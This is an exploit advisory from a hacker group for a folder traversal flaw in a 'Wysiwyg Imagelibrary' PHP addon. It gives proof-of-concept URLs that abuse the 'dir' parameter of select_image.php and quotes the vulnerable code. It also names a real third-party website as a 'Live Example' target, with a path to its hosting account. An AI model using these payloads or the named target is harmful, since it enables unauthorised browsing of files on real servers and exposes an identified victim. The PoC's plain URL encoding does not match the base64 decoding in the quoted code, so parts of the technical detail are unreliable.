facebook facebook twitter rss

Wysiwyg Imagelibrary Addons (Folders Traversal)

Author: Asmar , Published: 25-10-2012
# Author : Geek
# Title : Wysiwyg Imagelibrary Addons (Folders Traversal)
# Date : Today :P
# Site : Sec4ever.com

# p0x :

{x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=full path to public_html or httpdocs
{x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=..%2Fhome..%2Fuser..%2Fpublic_html

# Code :

$get_dir = isset($_GET['dir']) ? prepare_input($_GET['dir']) : "";

......

if($get_dir){
$dir = base64_decode($get_dir);

if(substr($dir, -1, 1)!='/') {
$dir = $dir . '/';
}
$dirok = true;
$dirnames = split('/', $dir);
for($di=0; $di<sizeof($dirnames); $di++) {
if($di<(sizeof($dirnames)-2)) {
$dotdotdir = $dotdotdir . $dirnames[$di] . '/';
}
}
if(substr($dir, 0, 1)=='/') {
$dirok = false;
}

if($dir == $leadon) {
$dirok = false;
}

if($dirok) {
$leadon = $dir;
}
}

$opendir = $leadon;
if(!$leadon) $opendir = '.';
if(!file_exists($opendir)) {
$opendir = '.';
$leadon = $startdir;
}


# Live Example :

{X} http://www.tourismhalong.com/includes/wysiwyg/addons/imagelibrary/select_image.php?dir=%2Fhome%2Ftouris8%2Fpublic_html

# Greet'z : b0x,Sec4ever,paulzz,The Sword,The Injector,B07 M4ST3R,Jago :P,LinuxAC,Cmos-CLR :P <3 And All Sec4ever VIP Members And Others :)

Like us on Facebook :